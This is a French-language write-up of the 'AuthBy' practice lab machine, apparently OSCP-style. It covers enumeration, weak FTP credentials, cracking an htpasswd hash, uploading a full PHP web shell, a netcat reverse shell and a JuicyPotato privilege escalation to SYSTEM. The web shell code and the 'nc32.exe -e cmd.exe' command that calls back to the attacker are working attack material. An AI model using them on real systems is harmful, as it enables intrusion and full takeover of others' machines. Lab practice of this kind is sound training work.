# AuthBy

`ftp`

* Nom machine : AuthBy
* Difficulté : Intermédiaire
* OS : Windows

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-06 03:40 EDT
Nmap scan report for 192.168.212.46
Host is up (0.035s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 Aug 06 14:40 log
| ----------   1 root     root         2275 Aug 08  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Apr 12 01:39 accounts
242/tcp  open  http               Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
3145/tcp open  zftp-admin         zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2024-08-06T07:43:16+00:00
|_ssl-date: 2024-08-06T07:43:21+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2024-04-10T18:40:02
|_Not valid after:  2024-10-10T18:40:02
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

### FTP (21) : zFTPServer 6.0 build 2011-10-17

Comme montré sur le scan nmap, nous pouvons nous connecter en FTP de manière anonyme. Cependant, nous n'obtenons rien d'intéressant, nous ne pouvont pas télécharger les fichier. Nous apprenons néanmoins en listant le directoire accounts qu'il y a 3 utilisateurs :

* Offsec
* Anonymous
* Admin

Nous allons tenter différent mot de pase pour l'utilisateur et admin:admin fonctionne.

```
┌──(kali㉿kali)-[~/oscp/astro]
└─$ ftp 192.168.212.46          
Connected to 192.168.212.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.212.46:kali): admin
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2093|)
150 Opening connection for /bin/ls.
total 3
-r--r--r--   1 root     root           76 Nov 08  2011 index.php
-r--r--r--   1 root     root           45 Nov 08  2011 .htpasswd
-r--r--r--   1 root     root          161 Nov 08  2011 .htaccess
226 Closing data connection.
ftp> mget *
```

```
┌──(kali㉿kali)-[~/oscp/astro]
└─$ cat .*       
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

┌──(kali㉿kali)-[~/oscp/astro]
└─$ echo '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > hash.txt 
                                                                             
┌──(kali㉿kali)-[~/oscp/astro]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elite            (?)     
1g 0:00:00:00 DONE (2024-08-06 05:30) 16.66g/s 424000p/s 424000c/s 424000C/s 191192..tyler03
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

offsec:elite

### zFTP-admin (3145) : zFTPServer admin

Impossible de s'y connecter pour le moment.

### HTTP (242)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2F7RBrSB4rSNqMOvveDTCA%2F7d3a7ef35d475c591f56169696f5c6ed.png?alt=media&#x26;token=d684b18f-f4b2-483a-9e8e-3e85efb38bc2" alt=""><figcaption></figcaption></figure>

Entrer les identifiants précédemment trouvés pour avoir accès à la page.

## Local exploitation

Maintenant que nous avons accès à la page web et pouvant nous connecter via admin en ftp, nous allons pouvoir uploader un reverse-shell sur le serveur.

```
┌──(kali㉿kali)-[~]
└─$ cat shell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
```

```
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.212.46
Connected to 192.168.212.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.212.46:kali): admin
331 User name received, need password.
Password: 
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||2051|)
150 File status okay; about to open data connection.
100% |********************************|  1401      942.26 KiB/s    00:00 ETA
226 Closing data connection.
348 bytes sent in 00:00 (18.02 KiB/s)
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FcLfqkNAzpMXmVk0arYg4%2F07f65129544484525de2b0b94baa5a8b.png?alt=media&#x26;token=bd02f7be-ef65-4c87-b13b-525878741764" alt=""><figcaption></figcaption></figure>

Nous allons utiliser le reverse-shell PowerShell base64 de :

<https://www.revshells.com/>

Nous lançons un listeneur avant d'exécuter le code.

Il ne fonctionne pas !

Sans résultat, nous allons cette fois essayer le reverse shell php de Ivan Sincek : il fonctionne !

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 242 
listening on [any] 242 ...
connect to [192.168.45.240] from (UNKNOWN) [192.168.163.46] 49159
SOCKET: Shell has connected! PID: 2712
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\Apache2.2.21>whoami
livda\apache
```

## Escalade de privilège

```
C:\Users\apache\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

`SeImpersonatePrivilege`

```
C:\Users\apache\Desktop>systeminfo

Host Name:                 LIVDA
OS Name:                   Microsoftr Windows Serverr 2008 Standard 
OS Version:                6.0.6001 Service Pack 1 Build 6001
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                92573-OEM-7502905-27565
Original Install Date:     12/19/2009, 11:25:57 AM
System Boot Time:          8/30/2024, 6:06:21 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
```

`X86-based PC`

{% embed url="<https://github.com/ivanitlearning/Juicy-Potato-x86/releases>" %}

Nous allons également télécharger nc32.exe sur la cible.

```
C:\Users\apache\Desktop>juicy.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\apache\desktop\nc32.exe -e cmd.exe 192.168.45.240 242" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}
Testing {03ca98d6-ff5d-49b8-abc6-03dd84127020} 1337
....
[+] authresult 0
{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 242
listening on [any] 242 ...
connect to [192.168.45.240] from (UNKNOWN) [192.168.163.46] 49453
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```